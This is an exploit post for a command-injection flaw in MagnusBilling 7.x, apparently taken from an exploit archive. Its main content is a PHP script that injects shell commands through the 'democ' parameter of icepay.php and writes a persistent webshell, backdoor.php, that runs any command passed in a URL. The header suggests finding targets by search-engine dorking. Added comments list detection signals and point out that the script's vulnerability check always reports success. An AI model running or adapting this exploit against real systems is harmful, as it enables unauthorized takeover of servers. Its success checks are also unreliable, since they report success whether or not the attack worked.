## https://sploitus.com/exploit?id=PACKETSTORM:182167
=============================================================================================================================================
| # Title : MagnusBilling 7.x Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.magnusbilling.org/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or another search engine.
[+] Uses CURL to allow remote commands.
[+] Line 83: set your target.
[+] Save the code as poc.php.
[+] Usage: cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
/**
 * PoC harness for the MagnusBilling 7.x command-injection issue described above.
 *
 * What the code below actually exercises:
 *  - Injection point: the `democ` GET parameter of lib/icepay/icepay.php
 *    (see executeCommand()); the value is concatenated without URL-encoding.
 *  - Post-exploitation artifact: a one-line PHP webshell named backdoor.php,
 *    written by the injected command into its working directory and assumed
 *    by exploit() to land under lib/icepay/.
 *
 * Reviewer note (defensive): detection signals derivable from this code are
 * requests to lib/icepay/icepay.php whose `democ` value contains shell
 * metacharacters (`;`, `#`), and new .php files appearing under lib/icepay/.
 * No method below verifies its own success; see the per-method notes.
 */
class MagnusBillingExploit {
// Base URL of the target, e.g. 'http://host/mbilling'. No trailing slash is
// expected because every method appends a path that starts with '/'.
private $targetUri;
// Filename of the dropped webshell. Assigned only inside
// uploadBackdoorWebShell(), so it is null until that method has run.
private $webShellName;
/**
 * @param string $targetUri base URL of the target; no validation is performed
 */
public function __construct($targetUri) {
$this->targetUri = $targetUri;
}
// Function to execute commands on the target
/**
 * Sends one GET request carrying the injected command.
 * The query value is `/dev/null;<cmd>;#`: the `;` terminates the value the
 * vulnerable script presumably hands to a shell, `<cmd>` then runs, and `#`
 * comments out whatever follows. $cmd is appended raw (no urlencode()), so
 * commands containing spaces or URL-special characters depend on how the
 * http stream wrapper transmits them.
 *
 * @param string $cmd shell command to inject
 * @return string|false response body, or false on request failure (PHP emits a warning)
 */
public function executeCommand($cmd) {
$url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';
return file_get_contents($url); // Send HTTP request
}
// Function to execute PHP code on the target
/**
 * Posts base64-encoded PHP to the dropped webshell.
 * NOTE(review): never called by exploit() or check(). It also reads
 * $this->postParam, which no property declares or assigns, so the POST field
 * name resolves to null (an "Undefined property" warning on PHP 8+). Looks like
 * a leftover from a different shell variant, inconsistent with the GET-driven
 * shell written by uploadBackdoorWebShell().
 *
 * @param string $cmd PHP code to send
 * @return string|false response body, or false on failure
 */
public function executePhp($cmd) {
$payload = base64_encode($cmd);
$url = $this->targetUri . '/lib/icepay/' . $this->webShellName;
$postFields = [$this->postParam => $payload];
return $this->sendPostRequest($url, $postFields); // Send POST request
}
// Upload backdoor webshell to the target
/**
 * Drops the webshell through the command-injection primitive.
 * The shell source is base64-encoded here, decoded on the target with
 * `base64 -d`, and redirected to ./backdoor.php relative to the injected
 * command's working directory (exploit() assumes that is lib/icepay/; nothing
 * here checks it). Relies on a POSIX shell with `base64` available on the target.
 *
 * @return string|false raw response of the injection request; a truthy value
 *                      does not prove the file was written
 */
public function uploadBackdoorWebShell() {
// Name of the webshell to be uploaded
$this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file
// Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')
$backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";
// Encode the webshell content
$encodedPayload = base64_encode($backdoorCode);
// Construct the command to upload the backdoor
$cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";
// Execute the command to upload the backdoor
return $this->executeCommand($cmd);
}
// Check if the target can be exploited
/**
 * Fingerprints the target and sends a time-based probe.
 * Only the case-insensitive banner match on "MagnusBilling" gates the verdict:
 * after sending `sleep N` the code sleeps locally for the same N seconds and
 * returns the "Vulnerable" string unconditionally, without timing the request.
 * The return value is therefore not evidence of injection. exploit() never
 * calls this method.
 *
 * @return string human-readable verdict
 */
public function check() {
$url = $this->targetUri;
$response = file_get_contents($url);
if (!$response || !preg_match('/MagnusBilling/i', $response)) {
return "Safe: Likely not a MagnusBilling application.";
}
$sleepTime = rand(4, 8);
$this->executeCommand("sleep {$sleepTime}");
sleep($sleepTime); // Simulate blind command injection
return "Vulnerable: Command injection successful.";
}
// Main function to exploit the target
/**
 * Entry point: uploads the webshell and prints where it is expected to be.
 * Any non-empty response body counts as success (die() fires only on a falsy
 * result), so a server answering with an error page still prints the
 * "uploaded" line. The printed path assumes the injected command ran with
 * lib/icepay/ as its working directory.
 *
 * @return void calls die() when the upload request returns a falsy value
 */
public function exploit() {
echo "Uploading backdoor...\n";
$result = $this->uploadBackdoorWebShell();
if (!$result) {
die("Backdoor upload failed.");
}
echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";
}
// Helper function to send POST requests
/**
 * Minimal form-encoded POST via the http stream wrapper.
 *
 * @param string $url
 * @param array<string, string> $postFields form fields, encoded with http_build_query()
 * @return string|false response body, or false on failure (PHP emits a warning)
 */
private function sendPostRequest($url, $postFields) {
$options = [
'http' => [
'method' => 'POST',
'header' => 'Content-Type: application/x-www-form-urlencoded',
'content' => http_build_query($postFields)
]
];
$context = stream_context_create($options);
return file_get_contents($url, false, $context);
}
}
// Usage example
// Constructs the harness with the placeholder base URL and goes straight to
// exploit(); check() is never run first, so the webshell drop is attempted
// against whatever URL is configured here.
$exploit = new MagnusBillingExploit('http://target-url/mbilling');
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================